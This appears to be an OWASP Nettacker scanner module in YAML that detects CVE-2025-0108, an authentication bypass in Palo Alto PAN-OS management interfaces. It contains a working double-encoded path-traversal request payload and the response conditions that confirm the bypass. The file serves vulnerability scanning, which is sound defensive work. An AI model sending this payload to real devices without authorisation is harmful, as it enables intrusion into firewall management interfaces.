Nettacker/nettacker/modules/vuln/paloalto_panos_cve_2025_010...

61 lines
1.8 KiB
YAML

info:
name: paloalto_panos_cve_2025_0108_vuln
author: OWASP Nettacker team
severity: 8.8
description: CVE-2025-0108 is an authentication bypass in the Palo Alto Networks PAN-OS software, which enables an unauthenticated attacker with network access to the management web interface to bypass the authentication
reference:
- https://security.paloaltonetworks.com/CVE-2025-0108
- https://www.assetnote.io/resources/research/nginx-apache-path-confusion-to-auth-bypass-in-pan-os
- https://www.bleepingcomputer.com/news/security/hackers-exploit-authentication-bypass-in-palo-alto-networks-pan-os/
- https://thehackernews.com/2025/02/cisa-adds-palo-alto-networks-and.html
profiles:
- vuln
- http
- high_severity
- cve
- paloalto
- paloalto_panos
- panos
- cisa_kev
payloads:
- library: http
steps:
- method: get
timeout: 3
headers:
User-Agent: "{user_agent}"
allow_redirects: false
ssl: false
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
prefix: ""
suffix: ""
interceptors:
data:
paths:
- "unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.css"
schema:
- "http"
- "https"
ports:
- 80
- 443
- 4443
- 8443
response:
condition_type: and
conditions:
status_code:
regex: "200"
reverse: false
header:
Content-Type:
regex: text/html
reverse: false
content:
regex: "Zero Touch Provisioning"
reverse: false